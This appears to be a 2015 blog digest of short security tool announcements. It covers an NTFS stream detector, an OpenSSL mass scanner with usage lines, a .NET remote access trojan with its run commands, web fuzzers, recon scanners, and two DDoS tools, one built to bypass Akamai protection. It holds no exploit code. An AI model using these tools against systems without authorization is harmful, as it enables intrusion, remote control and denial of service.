Nov 23, 2015

Tools: Stream Detector - Alternate Data Streams (ADS) Detector

NoVirusThanks Stream Detector is a useful utility which finds all hidden Alternate Data Streams (ADS) on NTFS drives. After finding the alternate data streams, you can extract these streams, delete the file, delete unwanted streams, or export the list of found streams to a log file. This program can also list multiple hidden streams and can properly detect alternate data streams on an actual folder\directory


Nov 18, 2015

Tools: MassBleed - MassBleed SSL Vulnerability Scanner

USAGE: sh [CIDR|IP] [single|port|subnet] [port] [proxy]
ABOUT: This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh port 8443)
  3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES: (example: sh 0 0 proxy) (example: sh port 8443 proxy) (example: sh single 0 proxy) (example: sh 192.168.0. subnet 0 proxy)
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)
REQUIREMENTS: Is the heartbleed POC present? Is the openssl CCS script present? Is unicornscan installed? Is nmap installed? Is sslscan installed?


Nov 16, 2015

Tools: Windows Remote Access Trojan (RAT)

Windows Remote Access Trojan (RAT) using .NET Sockets
Client-server binaries and source-code for controlling a remote machine behind a NAT with a command-line shell in Windows. Although the core provides support for communication with multiple RATs, the command-line interface used has limited capabilities distinguishing each one.
The RAT process executable does not hide itself from taskbar or task manager as it was developed for educational purposes only. Please do not use for any malicious purposes.
Contains the source code and the two binaries packaged using ILMerge.

  1. Start the server in a command-line acting as the RAT (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
  2. Start the client in a command-line acting as the controller (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
  3. Issue commands from the controller.exe interface

Tools: 0d1n - Web security tool to make fuzzing at HTTP inputs, made in C with libCurl

 0d1n is a tool for automating customized attacks against web applications.
*brute force passwords in auth forms
*diretory disclosure ( use PATH list to brute, and find HTTP status code )
*test list on input to find SQL Injection and XSS vulnerabilities
other things...


Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack

 How does TCP Spoofing work?
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi
HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly.

Tools: Sn1per – Automated Pentest Recon Scanner

Sn1per is an automated open source scanner that you can use during penetration testing. the tool allow to use some compilation of pentest utility such as the harvester , nmap and brute force against your target. some of the features are:
  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports
  • Automatically brute forces sub-domains and DNS info
  • Automatically runs targeted nmap scripts against open ports
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces all open services

Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner

JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.


Nov 7, 2015

Tools: SpiderFoot – Open Source Intelligence Automation Tool (OSINT)


There are three main areas where SpiderFoot can be useful:
  • If you are a pen-tester, SpiderFoot will automate the reconnaisance stage of the test, giving you a rich set of data to help you pin-point areas of focus for the test.
  • Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
  • SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.


SpiderFoot has plenty of features, including the following:
  • Utilises a lot of different data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
  • Designed for maximum data extraction; every piece of data is passed on to modules that may be interested, so that they can extract valuable information. No piece of discovered data is saved from analysis.
  • Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
  • Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
  • Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate. Take a look through the gallery for screenshots.
  • Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
  • Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
  • SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart’s content.
  • Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.

Tools: Bluto - Recon, Subdomain Bruting, Zone Transfers

DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration
Author: Darryl Lane | Twitter: @darryllane101
The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.
Bluto now does email address enumeration based on the target domain, currently using Bing and Google search engines. It is configured in such a way to use a random User Agent: on each request and does a country look up to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas, however exsesive lookups will result in captchas (Bluto will warn you if any are identified).


Nov 2, 2015

Tools: ARDT - Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.